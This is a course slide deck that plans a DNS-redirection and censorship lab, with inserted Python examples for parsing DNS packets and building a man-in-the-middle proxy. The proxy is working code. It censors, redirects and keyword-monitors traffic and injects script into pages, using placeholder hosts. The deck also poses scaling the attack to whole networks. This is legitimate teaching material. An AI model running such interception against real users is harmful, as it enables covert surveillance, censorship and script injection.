DNS POISONING + CENSORSHIP LAB DUSTIN VANDENBERG, VIPUL AGARWAL, LIANG ZHAO.

Date post: 26-Dec-2015

DNS POISONING + CENSORSHIP LAB

DUSTIN VANDENBERG, VIPUL AGARWAL, LIANG ZHAO

WHERE WERE WE LAST TIME?

• Rough outline of the content of the lab

• Real world connections

• General explanation of DNS

PROGRESS SINCE LAST UPDATE

• Researched various sources

• Helps our understanding

• Can provide resources in lab as hints

• Fleshed out ideas into main steps of lab

• Answered questions posed by Professor

SOURCES COMPILED

• DNS Architecture

• The Hosts File and What it can do for you

• Decrypting SSL traffic with Wireshark and ways to prevent it

• Traffic Analysis with Wireshark

• Using Wireshark to Decode SSL/TLS Packets

• Investigation of DHCP Packets using Wireshark

• Wireshark Lab: DNS

• Wireshark User’s Guide

• Man in the Middle Attack: Tutorial

BACKGROUND REQUIRED

• What is DNS

• Using Wireshark

• Socket Programming (C, C++, Java)

• Proxies

• Man-in-the-Middle Attack

• Cookies

Professor Egele asked about using compiled vs. non-compiled languages:

• Compiled would be better to simulate a “virus” which can be spread and execute remotely

STEP 1: RECONNAISSANCE

• Use Wireshark to examine the HTTP packets exchanged with your “target” website and the DNS packets that resolve its name (note that the DNS traffic goes to your resolver, not to the website), and answer the following:

• What is the IP address associated with that website?

• Where is the traffic going from/to?

• What information is being sent in the HTTP packets?

• Is any of the information encrypted? If so, how does this complicate this process?

• What ports are being used?

Professor Egele asked about DNS vs HTTP
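Step 1 asks what the DNS packets for the target name contain. The following is an added example, not part of the lab or any of the sources listed above, that decodes a DNS A-record response the way Wireshark's DNS dissector does. The packet is constructed inline (not a real capture) for the hypothetical name example.test and the documentation address 192.0.2.10; the answer's name field uses a compression pointer (0xC00C back to the question name), which is the part that makes reading a real capture by hand confusing. Keep in mind for Step 3 that once the hosts file is edited, no such packet appears on the wire at all: the stub resolver answers from the file and never sends a query.

```python
import struct

# Constructed sample (not a real capture): a DNS response for "example.test A"
# answering 192.0.2.10 with TTL 300. Name and address are hypothetical.
def build_sample_response():
    header = struct.pack("!HHHHHH", 0x1A2B, 0x8180, 1, 1, 0, 0)  # id, flags (QR,RD,RA), QD,AN,NS,AR
    qname = b"\x07example\x04test\x00"
    question = qname + struct.pack("!HH", 1, 1)                  # QTYPE A, QCLASS IN
    # The answer's name is a compression pointer to offset 12 (the question name)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([192, 0, 2, 10])
    return header + question + answer


def read_name(pkt, off):
    """Decode a (possibly compressed) name at off; return (name, offset after the field)."""
    labels, end, hops = [], None, 0
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:                    # compression pointer: 2 bytes, 14-bit offset
            if end is None:
                end = off + 2                        # the field ends after the first pointer
            off = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:                              # root label terminates the name
            break
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_dns(pkt):
    """Parse the header, the questions and the A answers from a raw DNS message."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off, questions, a_records = 12, [], []
    for _ in range(qd):
        name, off = read_name(pkt, off)
        qtype, _ = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, off = read_name(pkt, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:                # A record: 4-byte IPv4 address
            a_records.append((name, ".".join(str(b) for b in rdata), ttl))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "rcode": flags & 0xF, "questions": questions, "a_records": a_records}


if __name__ == "__main__":
    print(parse_dns(build_sample_response()))
```

To compare against a real capture, apply the Wireshark display filter `dns.flags.response == 1 && dns.qry.name == "example.test"` and check that the transaction ID, the question and the A answer match what the client later uses as the HTTP destination.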

STEP 2: CONTROL SYSTEM

• Use Java, C, or C++ to create a man-in-the-middle proxy which does the following:

• Accepts incoming connections on the same port that we found was used before (80 for plain HTTP; binding to it needs administrator/root privileges)

• Can open outbound connections from the localhost to the real server (by IP address, because once the hosts file is edited the hostname will resolve back to the proxy itself)

• Can read and edit the content which is received and sent between these connections

• This is the basic framework

• We will add more functionality later

STEP 3: REDIRECT

• Edit the hosts file to redirect traffic to your control system (e.g. map the target hostname to 127.0.0.1; the file is /etc/hosts on Linux/macOS and C:\Windows\System32\drivers\etc\hosts on Windows, and editing it requires administrator/root privileges)

• Use Wireshark to ensure that the packets are being properly redirected (expect the HTTP connection to go to 127.0.0.1 and no DNS query for the name at all)

• How are the DNS packets different?

• How are the HTTP packets different?

• Can the client still communicate with the server?

• What are the limitations of this technique?

• What are the limitations on editing hosts files?

• Are there other ways to accomplish the same goal?

STEP 4: EXPLOIT

• Block all access to the “target” site.

• What are different ways this can be done?

• Redirect the user to a completely different site

• Monitor the traffic for “keywords”

• Send some sort of warning to the “attacker” whenever a site has those words

• Replace content from the site with completely new content

• Change/censor part of the content

• Add content to the site presented to the user

• Can this be used in the context of XSS? (hint: yes)

Suggested by Professor Egele
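Steps 2 to 4 together describe one piece of software: a proxy that the hosts file points the browser at, which forwards to the real site and edits what passes through. The following is an added example, not code from the lab (which suggests Java, C or C++; Python is used here for brevity) or from any of the listed sources. Everything in it is assumed for illustration: the target name example.test, its real address 192.0.2.10 (what Step 1 would have found), the "other site" 203.0.113.5, and port 8080 instead of 80 so it runs without root. The policy dictionary implements each Step 4 item: block a path, redirect a path, alert the "attacker" on keywords, replace content, and inject a script, which runs in the target site's origin (the XSS point). The two details a practitioner needs are in the comments: the upstream connection is made by IP, because resolving the name would hit the hosts entry and loop back to the proxy, and the upstream request is sent as HTTP/1.0 with identity encoding so the response arrives uncompressed and unchunked and can be rewritten as a whole. This only works for plain HTTP; over HTTPS the browser would reject the proxy's certificate, which is the Step 5 question.

```python
import socket
import threading

# Assumed lab values (hypothetical): target hostname, the real IP found in Step 1
# with Wireshark, and a non-privileged listen port (the lab's port 80 needs root).
TARGET_HOST = "example.test"
UPSTREAM_IP = "192.0.2.10"
LISTEN = ("127.0.0.1", 8080)

# Censorship policy for Step 4: block, redirect, keyword alert, replace, inject.
POLICY = {
    "block": {b"/secret"},
    "redirect": {b"/news": b"http://203.0.113.5/"},   # hypothetical "different site"
    "keywords": [b"protest", b"leak"],
    "replace": [(b"Original content", b"Sanitized content")],
    "inject": b"<script>/* inserted by the proxy; runs in the site's origin */</script>",
}


def parse_request_head(head):
    """Split an HTTP request head (bytes, up to the blank line) into its parts."""
    lines = head.split(b"\r\n")
    method, path, version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def decide(path):
    """Return ('block', None), ('redirect', url) or ('forward', None) for a request path."""
    if path in POLICY["block"]:
        return ("block", None)
    if path in POLICY["redirect"]:
        return ("redirect", POLICY["redirect"][path])
    return ("forward", None)


def block_response():
    body = b"<h1>Blocked</h1>"
    return (b"HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n"
            b"Content-Length: %d\r\nConnection: close\r\n\r\n" % len(body)) + body


def redirect_response(url):
    return b"HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\nConnection: close\r\n\r\n" % url


def rewrite_request(method, path, headers):
    """Re-emit the request for the real server: HTTP/1.0 so the server cannot use chunked
    encoding, identity so the body is not compressed, close so we can read to EOF."""
    headers = dict(headers)
    headers[b"host"] = TARGET_HOST.encode()
    headers[b"connection"] = b"close"
    headers[b"accept-encoding"] = b"identity"
    lines = [b"%s %s HTTP/1.0" % (method, path)]
    lines += [b"%s: %s" % (name, value) for name, value in headers.items()]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def rewrite_response(raw):
    """Apply keyword alerts, replacement and injection to a whole HTTP response.
    Returns (new_response_bytes, matched_keywords); Content-Length is recomputed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw, []
    alerts = [kw for kw in POLICY["keywords"] if kw in body]
    for old, new in POLICY["replace"]:
        body = body.replace(old, new)
    body = body.replace(b"</body>", POLICY["inject"] + b"</body>", 1)
    kept = [l for l in head.split(b"\r\n") if not l.lower().startswith(b"content-length:")]
    kept.append(b"Content-Length: %d" % len(body))
    return b"\r\n".join(kept) + b"\r\n\r\n" + body, alerts


def handle(client):
    with client:
        req = b""
        while b"\r\n\r\n" not in req:               # read the request head (GET only)
            chunk = client.recv(4096)
            if not chunk:
                return
            req += chunk
        method, path, _, headers = parse_request_head(req.split(b"\r\n\r\n", 1)[0])
        action, arg = decide(path)
        if action == "block":
            client.sendall(block_response())
            return
        if action == "redirect":
            client.sendall(redirect_response(arg))
            return
        # Connect by IP: resolving TARGET_HOST here would hit the hosts entry and loop back to us.
        with socket.create_connection((UPSTREAM_IP, 80)) as upstream:
            upstream.sendall(rewrite_request(method, path, headers))
            raw = b""
            while chunk := upstream.recv(65536):
                raw += chunk
        out, alerts = rewrite_response(raw)
        for kw in alerts:                            # the "warning to the attacker"
            print("[ALERT] keyword %r in response for %s" % (kw, path.decode(errors="replace")))
        client.sendall(out)


if __name__ == "__main__":
    # After adding "127.0.0.1 example.test" to the hosts file, browse to http://example.test:8080/
    with socket.create_server(LISTEN) as server:
        while True:
            conn, _ = server.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()
```

Under Wireshark the redirected run shows the difference the Step 3 questions ask about: no DNS query for the name, the browser's TCP connection going to 127.0.0.1:8080, and a second connection from the proxy to 192.0.2.10:80 carrying the rewritten HTTP/1.0 request. Replacing the body without fixing Content-Length is the classic mistake here; the browser would truncate or hang on the response.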

STEP 5: CONTEXT

• What sort of access does an attacker need to execute this?

• What protections are there to prevent this?

• Does SSL/HTTPS stop this? What can it do?

• How has this been applied on larger scales?

• Can this be done for an entire local network, rather than a single computer?

• How would one go about that?

NEXT STEPS

• Write out lab in TWiki with formatting and questions

• Test lab

• Figure out the timing/difficulty of each question

• Narrow down sources and decide what information to provide

QUESTIONS?

